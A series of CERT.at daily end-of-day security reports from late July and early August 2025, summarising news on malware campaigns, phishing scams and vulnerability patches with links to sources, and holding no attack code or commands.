∗∗∗ Delta Electronics DIAView ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-219-01
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 05-08-2025 18:00 − Wednesday 06-08-2025 18:00
Handler: Felician Fuchs
Co-Handler: Guenes Holler
=====================
= News =
=====================
∗∗∗ Driver of destruction: How a legitimate driver is being used to take down AV processes ∗∗∗
---------------------------------------------
In an incident response case, Kaspersky experts discovered new malware that terminates AV processes by abusing the legitimate ThrottleStop driver.
---------------------------------------------
https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/
∗∗∗ CISA Adds 3 D-Link Router Flaws to KEV Catalog After Active Exploitation Reports ∗∗∗
---------------------------------------------
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added three old security flaws impacting D-Link routers to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation in the wild.
---------------------------------------------
https://thehackernews.com/2025/08/cisa-adds-3-d-link-router-flaws-to-kev.ht…
∗∗∗ CERT-UA Warns of HTA-Delivered C# Malware Attacks Using Court Summons Lures ∗∗∗
---------------------------------------------
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks carried out by a threat actor called UAC-0099 targeting government agencies, the defense forces, and enterprises of the defense-industrial complex in the country.
---------------------------------------------
https://thehackernews.com/2025/08/cert-ua-warns-of-hta-delivered-c.html
∗∗∗ GenAI Used For Phishing Websites Impersonating Brazil’s Government ∗∗∗
---------------------------------------------
In this blog post, ThreatLabz explores a campaign that uses generative AI tools like DeepSite AI and BlackBox AI to create malicious replicas of Brazil's State Department of Traffic and Ministry of Education.
---------------------------------------------
https://www.zscaler.com/blogs/security-research/genai-used-phishing-website…
∗∗∗ Criminals send fake payment requests in the name of the WKO ∗∗∗
---------------------------------------------
The Wirtschaftskammer Österreich (WKO, the Austrian Federal Economic Chamber) has once again become the target of a phishing attack. A fraudulent e-mail is currently circulating that claims to come from the WKO. The e-mail creates the impression that an outstanding membership invoice has to be paid. The aim of the attack is to obtain personal information and login credentials.
---------------------------------------------
https://www.watchlist-internet.at/news/kriminelle-versenden-gefaelschte-zah…
∗∗∗ Makop Ransomware Identified in Attacks in South Korea ∗∗∗
---------------------------------------------
AhnLab Security Intelligence Center (ASEC) recently identified cases of Makop ransomware attacks targeting South Korean users. For several years the Makop ransomware has been distributed to South Korean users disguised as résumés or copyright-related emails. Recently, the ransomware has been reported to exploit RDP for its attacks.
---------------------------------------------
https://asec.ahnlab.com/en/89397/
∗∗∗ The Cost of a Call: From Voice Phishing to Data Extortion ∗∗∗
---------------------------------------------
In June, one of Google’s corporate Salesforce instances was impacted by similar UNC6040 activity described in this post. Google responded to the activity, performed an impact analysis and began mitigations. The instance was used to store contact information and related notes for small and medium businesses.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/voice-phishing-dat…
=====================
= Vulnerabilities =
=====================
∗∗∗ Experience Manager: Adobe leaves flaws unpatched for 90 days, now ships an emergency update ∗∗∗
---------------------------------------------
Since proof-of-concept code is in circulation, attacks on Adobe Experience Manager may be imminent. Attackers can target two security flaws [..] to attack systems. The vulnerabilities have been known since April this year, but security patches are only available now.
---------------------------------------------
https://www.heise.de/news/Experience-Manager-Adobe-patcht-90-Tage-nicht-und…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (kernel and python3.12-setuptools), Fedora (perl-Crypt-CBC and unbound), Gentoo (FontForge, GPL Ghostscript, Mozilla Network Security Service (NSS), and PAM), Oracle (gdk-pixbuf2, jq, kernel, mod_security, ncurses, python-requests, and python3-setuptools), Red Hat (python-requests and socat), SUSE (docker, kernel-livepatch-MICRO-6-0-RT_Update_2, kernel-livepatch-MICRO-6-0-RT_Update_4, kernel-livepatch-MICRO-6-0-RT_Update_5, kernel-livepatch-MICRO-6-0-RT_Update_6, kernel-livepatch-MICRO-6-0-RT_Update_7, kernel-livepatch-MICRO-6-0_Update_2, kernel-livepatch-MICRO-6-0_Update_4, kernel-livepatch-MICRO-6-0_Update_5, kernel-livepatch-MICRO-6-0_Update_6, kubeshark-cli, libgcrypt, pam-config, perl, python-requests, python311, and python313), and Ubuntu (linux-raspi).
---------------------------------------------
https://lwn.net/Articles/1032700/
∗∗∗ Docker: MCP security nightmare – six flaws identified ∗∗∗
---------------------------------------------
The container platform Docker warns of security risks arising from the use of MCP sources, which give attackers easy access to files, databases, the network and secrets. In addition, attackers can issue a wide range of commands and inject malicious code.
---------------------------------------------
https://heise.de/-10510262
∗∗∗ Security updates: Root attacks on Dell PowerProtect and Unity possible ∗∗∗
---------------------------------------------
To prevent possible attacks, admins should bring Dell PowerProtect Data Domain and Unity, UnityVSA and Unity XT up to date. Otherwise, attackers can, among other things, access instances with root privileges and compromise them.
---------------------------------------------
https://heise.de/-10511706
∗∗∗ JVN: Multiple vulnerabilities in Sato label printers CL4/6NX Plus and CL4/6NX-J Plus series ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN16547726/
∗∗∗ ZDI-25-771: Trend Micro Apex One Console Command Injection Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-25-771/
∗∗∗ ZDI-25-807: (0Day) AOMEI Cyber Backup Missing Authentication for Critical Function Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-25-807/
∗∗∗ Stable Channel Update for Desktop ∗∗∗
---------------------------------------------
http://chromereleases.googleblog.com/2025/08/stable-channel-update-for-desk…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 04-08-2025 18:00 − Tuesday 05-08-2025 18:00
Handler: Felician Fuchs
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ Android gets patches for Qualcomm flaws exploited in attacks ∗∗∗
---------------------------------------------
Google has released security patches for six vulnerabilities in Android's August 2025 security update, including two Qualcomm flaws exploited in targeted attacks.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/android-gets-patches-for-qua…
∗∗∗ Stealing Machine Keys for fun and profit (or riding the SharePoint wave) ∗∗∗
---------------------------------------------
About 10 days ago exploits for Microsoft SharePoint (CVE-2025-53770, CVE-2025-53771) started being publicly abused ..
---------------------------------------------
https://isc.sans.edu/diary/Stealing+Machine+Keys+for+fun+and+profit+or+ridi…
∗∗∗ Antivirus vendors fail to spot persistent, nasty, stealthy Linux backdoor ∗∗∗
---------------------------------------------
Plague malware has been around for months without tripping alarms. Researchers at German infosec services company Nextron Threat have spotted malware that creates a highly persistent Linux backdoor and say antivirus engines do not flag the code as malicious.
---------------------------------------------
https://www.theregister.com/2025/08/05/plague_linux_backdoor/
∗∗∗ CrowdStrike investigated 320 North Korean IT worker cases in the past year ∗∗∗
---------------------------------------------
Threat hunters saw North Korean operatives almost daily, reflecting a 220% year-over-year increase in activity, CrowdStrike said in a new report.
---------------------------------------------
https://cyberscoop.com/crowdstrike-north-korean-operatives/
∗∗∗ Mozilla: Phishing attacks on add-on developers observed ∗∗∗
---------------------------------------------
Criminals are currently targeting add-on developers who create extensions for Firefox.
---------------------------------------------
https://www.heise.de/news/Mozilla-warnt-vor-Phishing-Attacken-auf-Add-on-En…
∗∗∗ From code to stolen wallets: How hackers are trapping AI development tools ∗∗∗
---------------------------------------------
When AI becomes a target: at a time when AI technology is developing rapidly, AI has been increasingly integrated into our daily lives. However, due ..
---------------------------------------------
https://blog.360totalsecurity.com/en/from-code-to-stolen-wallets-how-hacker…
∗∗∗ Warning, fake shop: vorwerk-deutschland.de ∗∗∗
---------------------------------------------
Many customers think they have found a bargain on vorwerk-deutschland.de, where the new Thermomix TM7 is offered at a lower price. But beware: it is a fake shop that only accepts payment in advance. Anyone who orders here loses their money and receives no goods.
---------------------------------------------
https://www.watchlist-internet.at/news/achtung-fake-shop-vorwerk-deutschlan…
∗∗∗ Ukrainian hackers captured secret documents on Russia's newest nuclear submarine ∗∗∗
---------------------------------------------
The captured data includes crew lists, operational data and blueprints. According to the Ukrainian intelligence service, the submarine's weaknesses were also exposed.
---------------------------------------------
https://www.derstandard.at/story/3000000282244/ukrainische-hacker-erbeutete…
∗∗∗ Increased threat activity against SonicWall Gen 7 firewalls with SSLVPN - immediate measures recommended ∗∗∗
---------------------------------------------
SonicWall reports a significant increase in security incidents over the last 96 hours affecting Gen 7 SonicWall firewalls with SSLVPN enabled. The threat activity was reported both internally and by external organisations and companies such as Arctic Wolf, Google Mandiant and Huntress. It is not yet ..
---------------------------------------------
https://www.cert.at/de/warnungen/2025/8/erhohte-bedrohungsaktivitat-gegen-s…
∗∗∗ From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira ∗∗∗
---------------------------------------------
Bumblebee malware has been an initial access tool used by threat actors since late 2021. In 2023 the malware was first reported as using SEO poisoning as a delivery ..
---------------------------------------------
https://thedfirreport.com/2025/08/05/from-bing-search-to-ransomware-bumbleb…
∗∗∗ Cursor IDE: Persistent Code Execution via MCP Trust Bypass ∗∗∗
---------------------------------------------
Check Point Research uncovered a persistent remote code execution vulnerability in Cursor, a fast-growing AI-powered coding platform trusted by developers worldwide. The MCP vulnerability in Cursor allows attackers to gain long-term, silent access to ..
---------------------------------------------
https://blog.checkpoint.com/research/cursor-ide-persistent-code-execution-v…
∗∗∗ Vietnamese-speaking hackers appear to be running global data theft operation through Telegram ∗∗∗
---------------------------------------------
A combination of phishing lures, a previously spotted infostealer and Telegram bots are fueling a campaign by apparent Vietnamese-speaking hackers to capture and sell sensitive data globally.
---------------------------------------------
https://therecord.media/pxa-infostealer-telegram-bots-vietnamese-speaking-h…
∗∗∗ New insights into SharePoint-gate: staff in China for maintenance ∗∗∗
---------------------------------------------
Since the SharePoint disaster of July 2025, in which vulnerabilities were attacked, there have been new revelations almost every day. It was speculated that presumably Chinese hackers had advance access to internal ..
---------------------------------------------
https://www.borncity.com/blog/2025/08/05/neue-insights-zum-sharepoint-gate-…
∗∗∗ Microsoft Recall still captures credit card data and passwords (July 2025) ∗∗∗
---------------------------------------------
Is it a surprise? No, not a surprise, but to be expected. The Recall spying feature that Microsoft is pushing onto Windows systems continues to capture sensitive things such as credit card data and passwords. And this, ..
---------------------------------------------
https://www.borncity.com/blog/2025/08/05/microsoft-recall-erfasst-weiterhin…
∗∗∗ Detection Engineering: Practicing Detection-as-Code – Validation – Part 3 ∗∗∗
---------------------------------------------
In this part, we focus on implementing validation checks to improve consistency and ensure a minimum level of quality within the detection repository. Setting up validation pipelines is a key step, as it helps enforce the defined standards, reduce errors, and ensure that detections are reliable and consistent.
---------------------------------------------
https://blog.nviso.eu/2025/08/05/detection-engineering-practicing-detection…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Friday 01-08-2025 18:00 − Monday 04-08-2025 18:00
Handler: Felician Fuchs
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ Pi-hole discloses data breach triggered by WordPress plugin flaw ∗∗∗
---------------------------------------------
Pi-hole, a popular network-level ad-blocker, has disclosed that donor names and email addresses were exposed through a security vulnerability in the GiveWP WordPress donation plugin.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/pi-hole-discloses-data-breac…
∗∗∗ Mozilla warns of phishing attacks targeting add-on developers ∗∗∗
---------------------------------------------
Mozilla has warned browser extension developers of an active phishing campaign targeting accounts on its official AMO (addons.mozilla.org) repository.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/mozilla-warns-of-phishing-at…
∗∗∗ New Plague Linux malware stealthily maintains SSH access ∗∗∗
---------------------------------------------
A newly discovered Linux malware, which has evaded detection for over a year, allows attackers to gain persistent SSH access and bypass authentication on compromised systems.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-plague-malware-backdoors…
∗∗∗ Exchange: China accuses the USA of military hacking ∗∗∗
---------------------------------------------
China accuses US intelligence agencies of having exploited Microsoft Exchange vulnerabilities for over a year to steal military data.
---------------------------------------------
https://www.golem.de/news/exchange-china-wirft-den-usa-militaer-hacking-vor…
∗∗∗ CISA roasts unnamed critical national infrastructure body for shoddy security hygiene ∗∗∗
---------------------------------------------
Plaintext passwords, shared admin accounts, and insufficient logging rampant at mystery org. CISA is using the findings from a recent probe of an unidentified critical infrastructure organization to warn about the dangers of getting cybersecurity seriously wrong.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2025/08/02/cisa_coast_g…
∗∗∗ Lazarus Group rises again, this time with malware-laden fake FOSS ∗∗∗
---------------------------------------------
Software supply chain management vendor Sonatype last week published research in which it claimed that Lazarus Group has created hundreds of “shadow downloads” that appear to be popular open source software development tools but are full of malware.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2025/08/04/infosec_in_b…
∗∗∗ Fake refund e-mails in the name of the WKO ∗∗∗
---------------------------------------------
E-mails with the subject „Ihr möglicher Erstattungsbetrag von bis zu 476 Euro“ (your possible refund amount of up to 476 euros) are currently being sent to numerous members of the Austrian Federal Economic Chamber (WKO). They claim that there may be a claim for a refund of membership fees, which can be checked via a link. Warning: the link leads to a fraudulent website where personal data is stolen.
---------------------------------------------
https://www.watchlist-internet.at/news/betruegerische-e-mails-zu-rueckersta…
∗∗∗ Akira Ransomware Exploiting Potential Zero-Day in SonicWall SSL VPN ∗∗∗
---------------------------------------------
Arctic Wolf also suggests that the attacks could be exploiting an undetermined security flaw in the appliances, meaning a zero-day vulnerability, given that some of the incidents affected SonicWall devices which were fully patched.
---------------------------------------------
https://www.truesec.com/hub/blog/akira-ransomware-exploiting-potential-zero…
∗∗∗ Security incident at Logitech partner list after all ∗∗∗
---------------------------------------------
There was a security incident at a service provider that manages the Logitech partners on behalf of Logitech. In recent days, Logitech partners received a scam e-mail that warned of the risk of an attack on a MetaMask wallet but contained a phishing link.
---------------------------------------------
https://www.borncity.com/blog/2025/08/03/doch-sicherheitsvorfall-bei-logite…
∗∗∗ New Attack Uses Windows Shortcut Files to Install REMCOS Backdoor ∗∗∗
---------------------------------------------
Security firm Point Wild has exposed a new malware campaign using malicious LNK files to install the REMCOS backdoor. This report details how attackers disguise files to gain full system control.
---------------------------------------------
https://hackread.com/attack-windows-shortcut-files-install-remcos-backdoor/
∗∗∗ When Flatpak’s Sandbox Cracks: Real‑Life Security Issues Beyond the Ideal ∗∗∗
---------------------------------------------
Flatpak’s sandbox model is robust in design, but imperfect in deployment. Sandboxes dissolved through misconfiguration, vulnerabilities like CVE‑2024‑32462, and symlink exploits illustrate the friction between ideal and actual protection.
---------------------------------------------
https://www.linuxjournal.com/content/when-flatpaks-sandbox-cracks-real-life…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security update: phishing attacks on IBM Operational Decision Manager possible ∗∗∗
---------------------------------------------
IBM's business tool Operational Decision Manager is vulnerable. The developers have closed two security holes in the current versions.
---------------------------------------------
https://www.heise.de/news/Sicherheitsupdate-Phishingangriffe-auf-IBM-Operat…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (java-21-openjdk, kernel, libxml2, and lz4), Debian (exempi, ruby-graphql, and sope), Fedora (binutils, chromium, gdk-pixbuf2, libsoup3, poppler, and reposurgeon), Mageia (glib2.0 and wxgtk), Oracle (jackson-annotations, jackson-core, jackson-databind, jackson-jaxrs-providers, and jackson-modules-base and libxml2), Red Hat (kernel, pandoc, pcs, qemu-kvm, redis, and rsync), SUSE (chromedriver, coreutils, cosign, docker, gdk-pixbuf-devel, glib2, gnutls, grub2, gstreamer-plugins-base, helm, ignition, java-21-openjdk, jbigkit, jq, kernel, kubernetes1.28, kwctl, libxml2, nvidia-open-driver-G06-signed, opensc, pam-config, protobuf, python310, tgt, and valkey), and Ubuntu (linux-iot).
---------------------------------------------
https://lwn.net/Articles/1032371/
∗∗∗ Breaking NVIDIA Triton: CVE-2025-23319 - A Vulnerability Chain Leading to AI Server Takeover ∗∗∗
---------------------------------------------
Wiz Research discovers a critical vulnerability chain allowing unauthenticated attackers to take over NVIDIA's Triton Inference Server.
---------------------------------------------
https://www.wiz.io/blog/nvidia-triton-cve-2025-23319-vuln-chain-to-ai-server
∗∗∗ Critical Vulnerability in NestJS Devtools: Localhost RCE via Sandbox Escape ∗∗∗
---------------------------------------------
A flawed sandbox in @nestjs/devtools-integration lets attackers run code on your machine via CSRF, leading to full Remote Code Execution (RCE).
---------------------------------------------
https://socket.dev/blog/nestjs-rce-vuln
∗∗∗ VU#317469: Partner Software/Partner Web does not sanitize Report files and Note content, allowing for XSS and RCE ∗∗∗
---------------------------------------------
https://kb.cert.org/vuls/id/317469
∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2025-0005 ∗∗∗
---------------------------------------------
https://webkitgtk.org/security/WSA-2025-0005.html
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 31-07-2025 18:00 − Friday 01-08-2025 18:00
Handler: Guenes Holler
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Microsoft to disable Excel workbook links to blocked file types ∗∗∗
---------------------------------------------
Microsoft has announced that it will start disabling external workbook links to blocked file types by default between October 2025 and July 2026. [..] After the rollout, Excel workbooks referencing blocked file types will display a #BLOCKED error or fail to refresh, eliminating security risks associated with accessing unsupported or high-risk file types, including, but not limited to, phishing attacks that utilize workbooks to redirect targets to malicious payloads.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-to-disable-extern…
∗∗∗ Kali Linux can now run in Apple containers on macOS systems ∗∗∗
---------------------------------------------
Cybersecurity professionals and researchers can now launch Kali Linux in a virtualized container on macOS Sequoia using Apple's new containerization framework.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/kali-linux-can-now-run-in-ap…
∗∗∗ Experts Detect Multi-Layer Redirect Tactic Used to Steal Microsoft 365 Login Credentials ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed details of a new phishing campaign that conceals malicious payloads by abusing link wrapping services from Proofpoint and Intermedia to bypass defenses.
---------------------------------------------
https://thehackernews.com/2025/07/experts-detect-multi-layer-redirect.html
∗∗∗ Attackers Use Fake OAuth Apps with Tycoon Kit to Breach Microsoft 365 Accounts ∗∗∗
---------------------------------------------
Cybersecurity researchers have detailed a new cluster of activity where threat actors are impersonating enterprises with fake Microsoft OAuth applications to facilitate credential harvesting as part of account takeover attacks. "The fake Microsoft 365 applications impersonate various companies, including RingCentral, SharePoint, Adobe, and Docusign," Proofpoint said in a Thursday report.
---------------------------------------------
https://thehackernews.com/2025/08/attackers-use-fake-oauth-apps-with.html
∗∗∗ Huawei, at the heart of the Post outage ∗∗∗
---------------------------------------------
The cyberattack that hit Post (and Luxembourg) last week is believed to have targeted Huawei routers and their operating software. The presence of the Chinese giant at the heart of the infrastructure raises questions. The public company says it is reserving its answers for the MPs and ministers who will meet this Thursday at 10am in parliament.
---------------------------------------------
https://en.paperjam.lu/article/huawei-at-the-heart-of-the-post-outage
∗∗∗ CISA Releases Open-Source Eviction Strategies Tool for Cyber Incident Response ∗∗∗
---------------------------------------------
“How an organization approaches remediation and eviction of an incident is critically important to a successful response effort. Over the years, we have seen organizations struggle with identifying the right steps to take and the correct sequencing of actions to properly evict advanced adversaries from their enterprises,” said Jermaine Roebuck, Associate Director for Threat Hunting, CISA. “This tool will level the playing field by making it easier for IT staff and cyber defenders to coordinate efforts and achieve a successful eviction. I encourage public and private sector organizations to incorporate this capability into their incident response plans.”
---------------------------------------------
https://www.cisa.gov/news-events/news/cisa-releases-open-source-eviction-st…
∗∗∗ CISA and USCG Issue Joint Advisory to Strengthen Cyber Hygiene in Critical Infrastructure ∗∗∗
---------------------------------------------
CISA, in partnership with the U.S. Coast Guard (USCG), released a joint Cybersecurity Advisory aimed at helping critical infrastructure organizations improve their cyber hygiene. [..] CISA and USCG are sharing their findings and associated mitigations to assist other critical infrastructure organizations identify potential similar issues and take proactive measures to improve their cybersecurity posture. The mitigations include best practices such as not storing passwords or credentials in plaintext, avoiding sharing local administrator account credentials, and implementing comprehensive logging.
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2025/07/31/cisa-and-uscg-issue-join…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (firefox and thunderbird), Debian (libcommons-lang-java, node-form-data, redis, and sope), Fedora (chromium), Mageia (slurm), Oracle (apache-commons-beanutils, firefox, kernel, redis:6, and thunderbird), Red Hat (kernel, kernel-rt, libxml2, and redis), SUSE (chromium, docker, ffmpeg-7, gnutls, kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-t, libgcrypt, rav1e, and sccache), and Ubuntu (linux-lowlatency, linux-lowlatency-hwe-6.8).
---------------------------------------------
https://lwn.net/Articles/1032174/
∗∗∗ WordPress Vulnerability & Patch Roundup — July 2025 ∗∗∗
---------------------------------------------
https://blog.sucuri.net/2025/07/wordpress-vulnerability-patch-roundup-july-…
∗∗∗ Rockwell Automation Lifecycle Services with VMware ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-212-02
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 30-07-2025 18:00 − Thursday 31-07-2025 18:00
Handler: Guenes Holler
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ Hackers Exploit Critical WordPress Theme Flaw to Hijack Sites via Remote Plugin Install ∗∗∗
---------------------------------------------
The vulnerability, tracked as CVE-2025-5394, carries a CVSS score of 9.8. Security researcher Thái An has been credited with discovering and reporting the bug. According to Wordfence, the shortcoming relates to an arbitrary file upload affecting all versions of the plugin prior to and including 7.8.3. It has been addressed in version 7.8.5 released on June 16, 2025.
---------------------------------------------
https://thehackernews.com/2025/07/hackers-exploit-critical-wordpress.html
∗∗∗ N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto ∗∗∗
---------------------------------------------
The North Korea-linked threat actor known as UNC4899 has been attributed to attacks targeting two different organizations by approaching their employees via LinkedIn and Telegram.
---------------------------------------------
https://thehackernews.com/2025/07/n-korean-hackers-used-job-lures-cloud.html
∗∗∗ Scammers Unleash Flood of Slick Online Gaming Sites ∗∗∗
---------------------------------------------
Fraudsters are flooding Discord and other social media platforms with ads for hundreds of polished online gaming and wagering websites that lure people with free credits and eventually abscond with any cryptocurrency funds deposited by players. Here’s a closer look at the social engineering tactics and remarkable traits of this sprawling network of more than 1,200 scam sites.
---------------------------------------------
https://krebsonsecurity.com/2025/07/scammers-unleash-flood-of-slick-online-…
∗∗∗ Beware of this iCloud phishing e-mail ∗∗∗
---------------------------------------------
„Letzte Mitteilung: Ihre Fotos und Videos werden gelöscht – ergreifen Sie Maßnahmen!“ (final notice: your photos and videos will be deleted, take action!) With this subject line, criminals are currently sending phishing e-mails that appear to come from iCloud. Under the pretext that the storage subscription must be renewed, they try to obtain payment data.
---------------------------------------------
https://www.watchlist-internet.at/news/vorsicht-vor-dieser-icloud-phishing-…
∗∗∗ Patents by Silk Typhoon-linked company shed light on Beijing’s offensive hacking capabilities ∗∗∗
---------------------------------------------
SentinelOne's threat researchers pored through recent Justice Department indictments of prominent Chinese hackers and mapped out the country’s evolving web of private companies that are hired to launch cyberattacks on behalf of the government.
---------------------------------------------
https://therecord.media/patents-silk-typhoon-company-beijing
∗∗∗ GreyNoise Uncovers Early Warning Signals for Emerging Vulnerabilities ∗∗∗
---------------------------------------------
It’s well known that the window between CVE disclosure and active exploitation has narrowed. But what happens before a CVE is even disclosed? In our latest research “Early Warning Signals: When Attacker Behavior Precedes New Vulnerabilities,” GreyNoise analyzed hundreds of spikes in malicious activity — scanning, brute forcing, exploit attempts, and more — targeting edge technologies. We discovered a consistent and actionable trend: in the vast majority of cases, these spikes were followed by the disclosure of a new CVE affecting the same technology within six weeks.
---------------------------------------------
https://www.greynoise.io/blog/greynoise-uncovers-early-warning-signals-emer…
∗∗∗ In search of riches, hackers plant 4G-enabled Raspberry Pi in bank network ∗∗∗
---------------------------------------------
Hackers planted a Raspberry Pi equipped with a 4G modem in the network of an unnamed bank in an attempt to siphon money out of the financial institution's ATM system, researchers reported Wednesday.
---------------------------------------------
https://arstechnica.com/security/2025/07/in-search-of-riches-hackers-plant-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (firefox, java-21-openjdk, kernel, thunderbird, and unbound), Debian (chromium and systemd), Fedora (libtiff), Oracle (java-21-openjdk, libtpms, nodejs:22, redis:7, thunderbird, and unbound), Red Hat (firefox, redis, and thunderbird), SUSE (apache2, cdi-apiserver-container, cdi-cloner-container, cdi-controller-container, cdi-importer-container, cdi-operator-container, cdi-uploadproxy-container, cdi-uploadserver-container, cont, java-11-openjdk, kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestf, libarchive, nvidia-open-driver-G06-signed, redis, and rmt-server), and Ubuntu (linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx, linux-oracle, linux-oracle-5.15, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-6.14, linux-gcp, linux-gcp-6.14, linux-hwe-6.14, linux-oem-6.14, linux-raspi, linux-realtime, linux, linux-aws, linux-aws-6.8, linux-gcp, linux-gke, linux-gkeop, linux-hwe-6.8, linux-ibm, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-oem-6.8, linux-oracle, linux, linux-aws, linux-kvm, linux-aws, linux-lts-xenial, linux-aws-fips, linux-fips, linux-gcp-fips, linux-azure, linux-fips, linux-intel-iot-realtime, linux-realtime, linux-oracle, linux-oracle-6.8, linux-realtime, and sqlite3).
---------------------------------------------
https://lwn.net/Articles/1032083/
∗∗∗ Install quickly: Apple fixes zero-day attack in WebKit ∗∗∗
---------------------------------------------
Apple's updates for iOS, iPadOS and macOS, released in the night before Wednesday, should be installed quickly and urgently: as has only now become known, they also fix a WebKit bug for which an exploit already exists. So far, however, it is only being used to attack Chrome users, as the associated NIST entry states (CVE-2025-6558). The bug is rated "Severity: High". Confusingly, Apple does not warn of known active attacks in its security documentation, apparently because there are no corresponding reports for Apple's Safari browser yet.
---------------------------------------------
https://heise.de/-10505297
∗∗∗ Security update: vulnerabilities endanger HCL BigFix Remote Control ∗∗∗
---------------------------------------------
The endpoint management platform HCL BigFix is vulnerable (CVE-2025-31965, "high"), and attackers can view data without authorization or, with considerable effort and the right timing, even access a private key. Specifically, the vulnerabilities are in HCL BigFix Remote Control. A hardened version is available for download.
---------------------------------------------
https://heise.de/-10505415
∗∗∗ CVE-2025-8292 - DSA-5968-1 chromium - security update ∗∗∗
---------------------------------------------
https://lists.debian.org/debian-security-announce/2025/msg00132.html
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 29-07-2025 18:00 − Wednesday 30-07-2025 18:00
Handler: Felician Fuchs
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Attackers Can Use Browser Extensions to Inject AI Prompts ∗∗∗
---------------------------------------------
A brand-new cyberattack vector allows threat actors to use a poisoned browser extension to inject malicious prompts into all of the top generative AI tools on the market, including ChatGPT, Gemini, and others.
---------------------------------------------
https://www.darkreading.com/vulnerabilities-threats/attackers-use-browser-e…
∗∗∗ PyPI Warns of Ongoing Phishing Campaign Using Fake Verification Emails and Lookalike Domain ∗∗∗
---------------------------------------------
The maintainers of the Python Package Index (PyPI) repository have issued a warning about an ongoing phishing attack that's targeting users in an attempt to redirect them to fake PyPI sites. The attack involves sending email messages bearing the subject line "[PyPI] Email verification" that are sent from the email address noreply(a)pypj[.]org (note that the domain is not "pypi[.]org").
---------------------------------------------
https://thehackernews.com/2025/07/pypi-warns-of-ongoing-phishing-campaign.h…
∗∗∗ 2025 Unit 42 Global Incident Response Report: Social Engineering Edition ∗∗∗
---------------------------------------------
Social engineering thrives on trust and is now boosted by AI. Unit 42 incident response data explains why it's surging. We detail eight critical countermeasures.
---------------------------------------------
https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-r…
∗∗∗ Google Project Zero to publicly announce bugs within a week of reporting them ∗∗∗
---------------------------------------------
The vulnerability hunters at Google Project Zero want to address what they call the "upstream patch gap," when a vendor has a fix available but the downstream product providers haven't integrated it yet.
---------------------------------------------
https://therecord.media/google-project-zero-publicly-announce-vulnerabiliti…
∗∗∗ Decryptor released for FunkSec ransomware; Avast works with law enforcement to help victims ∗∗∗
---------------------------------------------
Cybersecurity company Avast released a decryptor for the short-lived FunkSec ransomware and said it is assisting dozens of the gang's targets with the process.
---------------------------------------------
https://therecord.media/funksec-ransomware-decryptor-avast
∗∗∗ New Choicejacking Attack Steals Data from Phones via Public Chargers ∗∗∗
---------------------------------------------
Choicejacking is a new USB attack that tricks phones into sharing data at public charging stations, bypassing security prompts in milliseconds.
---------------------------------------------
https://hackread.com/choicejacking-attack-steals-data-phones-public-charger…
∗∗∗ CISA Releases Part One of Zero Trust Microsegmentation Guidance ∗∗∗
---------------------------------------------
This guidance provides a high-level overview of microsegmentation, focusing on its key concepts, associated challenges and potential benefits, and includes recommended actions to modernize network security and advance zero trust principles.
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2025/07/29/cisa-releases-part-one-z…
=====================
= Vulnerabilities =
=====================
∗∗∗ New Lenovo UEFI firmware updates fix Secure Boot bypass flaws ∗∗∗
